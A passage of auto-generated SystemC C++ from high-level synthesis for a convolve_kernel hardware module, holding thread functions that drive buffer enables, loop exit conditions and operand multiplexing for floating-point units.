esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00011001.read(), ap_const_boolean_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read())) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00011001.read(), ap_const_boolean_0)) || (esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00011001.read(), ap_const_boolean_0)))) { bufw_EN_A = ap_const_logic_1; } else { bufw_EN_A = ap_const_logic_0; } } void convolve_kernel::thread_bufw_Rst_A() { bufw_Rst_A = ap_rst_n_inv.read(); } void convolve_kernel::thread_bufw_WEN_A() { bufw_WEN_A = ap_const_lv4_0; } void convolve_kernel::thread_col_b_1_fu_819_p2() { col_b_1_fu_819_p2 = (!ap_const_lv5_1.is_01() || !col_b_mid1_reg_2363.read().is_01())? sc_lv<5>(): (sc_biguint<5>(ap_const_lv5_1) + sc_biguint<5>(col_b_mid1_reg_2363.read())); } void convolve_kernel::thread_col_b_cast2_mid2_cas_fu_1182_p1() { col_b_cast2_mid2_cas_fu_1182_p1 = esl_zext<14,5>(col_b_cast2_mid2_reg_2489.read()); } void convolve_kernel::thread_col_b_cast2_mid2_fu_996_p3() { col_b_cast2_mid2_fu_996_p3 = (!tmp_2_mid2_reg_2328.read()[0].is_01())? sc_lv<5>(): ((tmp_2_mid2_reg_2328.read()[0].to_bool())? col_b_1_reg_2408.read(): col_b_mid1_reg_2363.read()); } void convolve_kernel::thread_col_b_mid1_fu_767_p3() { col_b_mid1_fu_767_p3 = (!tmp_7_reg_2322.read()[0].is_01())? sc_lv<5>(): ((tmp_7_reg_2322.read()[0].to_bool())? ap_const_lv5_0: col_b_reg_543.read()); } void convolve_kernel::thread_col_b_phi_fu_547_p4() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(exitcond_flatten3_reg_2229.read(), ap_const_lv1_0) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { col_b_phi_fu_547_p4 = col_b_cast2_mid2_reg_2489.read(); } else { col_b_phi_fu_547_p4 = col_b_reg_543.read(); } } void convolve_kernel::thread_exitcond_flatten1_fu_656_p2() { exitcond_flatten1_fu_656_p2 = (!indvar_flatten_phi_fu_535_p4.read().is_01() || !ap_const_lv10_100.is_01())? sc_lv<1>(): sc_lv<1>(indvar_flatten_phi_fu_535_p4.read() == ap_const_lv10_100); } void convolve_kernel::thread_exitcond_flatten2_fu_639_p2() { exitcond_flatten2_fu_639_p2 = (!indvar_flatten3_phi_fu_511_p4.read().is_01() || !ap_const_lv14_1000.is_01())? sc_lv<1>(): sc_lv<1>(indvar_flatten3_phi_fu_511_p4.read() == ap_const_lv14_1000); } void convolve_kernel::thread_exitcond_flatten3_fu_621_p2() { exitcond_flatten3_fu_621_p2 = (!indvar_flatten1_phi_fu_465_p4.read().is_01() || !ap_const_lv17_19000.is_01())? sc_lv<1>(): sc_lv<1>(indvar_flatten1_phi_fu_465_p4.read() == ap_const_lv17_19000); } void convolve_kernel::thread_exitcond_flatten43_m_fu_688_p2() { exitcond_flatten43_m_fu_688_p2 = (exitcond_flatten2_reg_2251.read() & not_exitcond_flatten_reg_2262.read()); } void convolve_kernel::thread_exitcond_flatten43_n_fu_662_p2() { exitcond_flatten43_n_fu_662_p2 = (exitcond_flatten2_reg_2251.read() ^ ap_const_lv1_1); } void convolve_kernel::thread_exitcond_flatten_fu_633_p2() { exitcond_flatten_fu_633_p2 = (!indvar_flatten2_phi_fu_488_p4.read().is_01() || !ap_const_lv16_5000.is_01())? sc_lv<1>(): sc_lv<1>(indvar_flatten2_phi_fu_488_p4.read() == ap_const_lv16_5000); } void convolve_kernel::thread_exitcond_flatten_mid_2_fu_692_p2() { exitcond_flatten_mid_2_fu_692_p2 = (exitcond_flatten_mid_fu_684_p2.read() & not_exitcond_flatten_1_reg_2274.read()); } void convolve_kernel::thread_exitcond_flatten_mid_fu_684_p2() { exitcond_flatten_mid_fu_684_p2 = (exitcond_flatten1_reg_2269.read() & not_exitcond_flatten_reg_2262.read()); } void convolve_kernel::thread_grp_fu_1043_p0() { grp_fu_1043_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_65_fu_1020_p2.read()); } void convolve_kernel::thread_grp_fu_1043_p1() { grp_fu_1043_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_65_fu_1020_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1112_p0() { grp_fu_1112_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_73_fu_1089_p2.read()); } void convolve_kernel::thread_grp_fu_1112_p1() { grp_fu_1112_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_73_fu_1089_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1190_p1() { grp_fu_1190_p1 = esl_zext<64,3>(i_cast7_mid2_reg_2386.read()); } void convolve_kernel::thread_grp_fu_1218_p0() { grp_fu_1218_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_81_fu_1195_p2.read()); } void convolve_kernel::thread_grp_fu_1218_p1() { grp_fu_1218_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_81_fu_1195_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1290_p0() { grp_fu_1290_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_89_fu_1267_p2.read()); } void convolve_kernel::thread_grp_fu_1290_p1() { grp_fu_1290_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_89_fu_1267_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1364_p0() { grp_fu_1364_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_97_fu_1341_p2.read()); } void convolve_kernel::thread_grp_fu_1364_p1() { grp_fu_1364_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_97_fu_1341_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1434_p0() { grp_fu_1434_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_105_fu_1411_p2.read()); } void convolve_kernel::thread_grp_fu_1434_p1() { grp_fu_1434_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_105_fu_1411_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1508_p0() { grp_fu_1508_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_122_fu_1485_p2.read()); } void convolve_kernel::thread_grp_fu_1508_p1() { grp_fu_1508_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_122_fu_1485_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1537_p0() { grp_fu_1537_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_129_fu_1514_p2.read()); } void convolve_kernel::thread_grp_fu_1537_p1() { grp_fu_1537_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_129_fu_1514_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1566_p0() { grp_fu_1566_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_136_fu_1543_p2.read()); } void convolve_kernel::thread_grp_fu_1566_p1() { grp_fu_1566_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_136_fu_1543_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1595_p0() { grp_fu_1595_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_143_fu_1572_p2.read()); } void convolve_kernel::thread_grp_fu_1595_p1() { grp_fu_1595_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_143_fu_1572_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1624_p0() { grp_fu_1624_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_150_fu_1601_p2.read()); } void convolve_kernel::thread_grp_fu_1624_p1() { grp_fu_1624_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_150_fu_1601_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1653_p0() { grp_fu_1653_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_157_fu_1630_p2.read()); } void convolve_kernel::thread_grp_fu_1653_p1() { grp_fu_1653_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_157_fu_1630_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_1682_p0() { grp_fu_1682_p0 = esl_concat<55,9>(ap_const_lv55_0, tmp_164_fu_1659_p2.read()); } void convolve_kernel::thread_grp_fu_1682_p1() { grp_fu_1682_p1 = esl_concat<62,2>(esl_concat<53,9>(ap_const_lv53_0, tmp_164_fu_1659_p2.read()), ap_const_lv2_0); } void convolve_kernel::thread_grp_fu_567_p0() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_13_reg_3749.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_12_reg_3744.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_11_reg_3739.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_10_reg_3734.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_s_reg_3729.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_9_reg_3724.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_8_reg_3719.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_7_reg_3714.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter7.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = reg_575.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_5_reg_3709.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_4_reg_3704.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_3_reg_3699.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_2_reg_3694.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_1_reg_3689.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = tmp_10_reg_3664.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p0 = bufo_load_reg_2809.read(); } else { grp_fu_567_p0 = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_grp_fu_567_p1() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter14.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter14_tmp_8_14_reg_3684.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter13_tmp_8_13_reg_3679.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter12.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter12_tmp_8_12_reg_3674.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter11_tmp_8_11_reg_3669.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter11.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter10_tmp_8_10_reg_3659.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter10.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter10_tmp_8_s_reg_3654.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter9.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter8_tmp_8_9_reg_3649.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter8.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter7_tmp_8_8_reg_3639.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter7.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter6_tmp_8_7_reg_3634.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter6.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter5_tmp_8_6_reg_3624.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter5.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter4_tmp_8_5_reg_3609.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter4.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter4_tmp_8_4_reg_3594.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter3_tmp_8_3_reg_3574.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter3.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = ap_reg_pp0_iter2_tmp_8_2_reg_3554.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter2.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = tmp_8_1_reg_3529.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00000000.read(), ap_const_boolean_0))) { grp_fu_567_p1 = tmp_8_reg_3429.read(); } else { grp_fu_567_p1 = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_grp_fu_571_p0() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_15_reg_3644.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_14_reg_3629.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_13_reg_3599.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_12_reg_3579.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage10.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage10_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_11_reg_3559.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage9.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage9_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_10_reg_3534.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage8.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage8_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_9_reg_3499.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage7.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage7_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_8_reg_2979.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage6.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage6_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_7_reg_3464.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage5.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage5_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_6_reg_3434.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage4.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage4_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_5_reg_3399.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage3.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage3_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_4_reg_3334.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage2.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage2_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_3_reg_3264.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage1.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage1_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_2_reg_3154.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage0_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_1_reg_3104.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter0.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage13.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage13_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p0 = bufw_load_reg_2804.read(); } else { grp_fu_571_p0 = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; } } void convolve_kernel::thread_grp_fu_571_p1() { if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage15.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage15_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_15_reg_3614.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage14.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage14_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_14_reg_3604.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage12.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage12_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_13_reg_3584.read(); } else if ((esl_seteq<1,1,1>(ap_const_logic_1, ap_CS_fsm_pp0_stage11.read()) && esl_seteq<1,1,1>(ap_const_logic_1, ap_enable_reg_pp0_iter1.read()) && esl_seteq<1,1,1>(ap_block_pp0_stage11_flag00000000.read(), ap_const_boolean_0))) { grp_fu_571_p1 = bufi_load_12_reg_3564.read(); } else if 